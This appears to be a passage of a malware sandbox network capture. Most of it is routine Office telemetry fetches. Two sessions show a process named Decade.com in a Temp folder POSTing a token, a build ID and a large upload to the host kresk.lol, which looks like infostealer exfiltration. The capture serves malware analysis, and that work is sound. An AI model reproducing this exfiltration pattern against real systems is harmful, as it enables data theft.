2024-12-04 11:17:31 UTC	192	OUT	GET /rules/rule120670v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:32 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:31 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91EAD002" x-ms-request-id: 26f79bf1-901e-0083-7ec4-45bb55000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111731Z-1746fd949bdzd2qvhC1EWRcygw00000000t00000000071mp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:32 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.2.4	49836	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:31 UTC	192	OUT	GET /rules/rule120672v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:32 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:31 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA740822" x-ms-request-id: 4879dc54-201e-0096-5ac3-45ace6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111731Z-1746fd949bdfg4slhC1EWR34t0000000010g0000000046cf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:32 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
86	192.168.2.4	49837	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:31 UTC	192	OUT	GET /rules/rule120673v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:32 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:32 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT ETag: "0x8DC582BB464F255" x-ms-request-id: 1e2c2913-401e-0078-28cc-454d34000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111732Z-1746fd949bdmv56chC1EWRypnn000000015g000000007zke x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:32 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	49838	159.69.102.165	443	7368	C:\Users\user\AppData\Local\Temp\112974\Decade.com

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:32 UTC	316	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----1NYCJM79RI5F3ECJMOHL User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kresk.lol Content-Length: 493 Connection: Keep-Alive Cache-Control: no-cache
2024-12-04 11:17:32 UTC	493	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 4e 59 43 4a 4d 37 39 52 49 35 46 33 45 43 4a 4d 4f 48 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 36 34 39 64 36 38 62 33 64 34 66 30 34 35 66 32 37 64 65 35 38 35 39 38 65 66 37 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 31 4e 59 43 4a 4d 37 39 52 49 35 46 33 45 43 4a 4d 4f 48 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 33 33 63 35 30 61 33 61 36 32 37 35 66 66 33 31 62 37 38 64 30 64 36 35 31 32 33 61 64 31 34 0d 0a 2d 2d 2d 2d 2d 2d 31 4e 59 43 4a 4d 37 39 52 49 35 46 33 45 43 4a 4d 4f 48 4c 0d 0a 43 6f 6e 74 Data Ascii: ------1NYCJM79RI5F3ECJMOHLContent-Disposition: form-data; name="token"89649d68b3d4f045f27de58598ef771d------1NYCJM79RI5F3ECJMOHLContent-Disposition: form-data; name="build_id"933c50a3a6275ff31b78d0d65123ad14------1NYCJM79RI5F3ECJMOHLCont
2024-12-04 11:17:33 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 11:17:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-04 11:17:33 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.4	49839	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:33 UTC	192	OUT	GET /rules/rule120674v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:33 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:33 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA4037B0D" x-ms-request-id: 85a1d3f6-901e-005b-3ecd-452005000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111733Z-1746fd949bdxk6n6hC1EWRdr8c00000000v00000000099yy x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:33 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.2.4	49840	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:33 UTC	192	OUT	GET /rules/rule120675v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:34 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:34 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6CF78C8" x-ms-request-id: 859f66ca-901e-005b-0ccc-452005000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111734Z-1746fd949bdl6zq5hC1EWRf3ws00000000q0000000008ttp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:34 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.2.4	49841	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:33 UTC	192	OUT	GET /rules/rule120676v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:34 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:34 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B984BF177" x-ms-request-id: 72953a3b-301e-0000-41cd-45eecc000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111734Z-1746fd949bd6zq92hC1EWRry480000000110000000006v6v x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:34 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.4	49842	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:33 UTC	192	OUT	GET /rules/rule120677v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:34 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:34 GMT Content-Type: text/xml Content-Length: 405 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT ETag: "0x8DC582B942B6AFF" x-ms-request-id: 92011275-e01e-0033-54c3-454695000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111734Z-1746fd949bd4w8sthC1EWR700400000000zg000000000ugw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:34 UTC	405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.2.4	49843	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:34 UTC	192	OUT	GET /rules/rule120678v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:34 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:34 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA642BF4" x-ms-request-id: 626f2b07-401e-0015-15d1-450e8d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111734Z-1746fd949bd6zq92hC1EWRry4800000000z000000000914p x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:34 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.4	49845	159.69.102.165	443	7368	C:\Users\user\AppData\Local\Temp\112974\Decade.com

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:35 UTC	319	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----RQQ9RQIEU37QQQIWT2NG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kresk.lol Content-Length: 169765 Connection: Keep-Alive Cache-Control: no-cache
2024-12-04 11:17:35 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 52 51 51 39 52 51 49 45 55 33 37 51 51 51 49 57 54 32 4e 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 36 34 39 64 36 38 62 33 64 34 66 30 34 35 66 32 37 64 65 35 38 35 39 38 65 66 37 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 52 51 51 39 52 51 49 45 55 33 37 51 51 51 49 57 54 32 4e 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 33 33 63 35 30 61 33 61 36 32 37 35 66 66 33 31 62 37 38 64 30 64 36 35 31 32 33 61 64 31 34 0d 0a 2d 2d 2d 2d 2d 2d 52 51 51 39 52 51 49 45 55 33 37 51 51 51 49 57 54 32 4e 47 0d 0a 43 6f 6e 74 Data Ascii: ------RQQ9RQIEU37QQQIWT2NGContent-Disposition: form-data; name="token"89649d68b3d4f045f27de58598ef771d------RQQ9RQIEU37QQQIWT2NGContent-Disposition: form-data; name="build_id"933c50a3a6275ff31b78d0d65123ad14------RQQ9RQIEU37QQQIWT2NGCont
2024-12-04 11:17:35 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:35 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:35 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
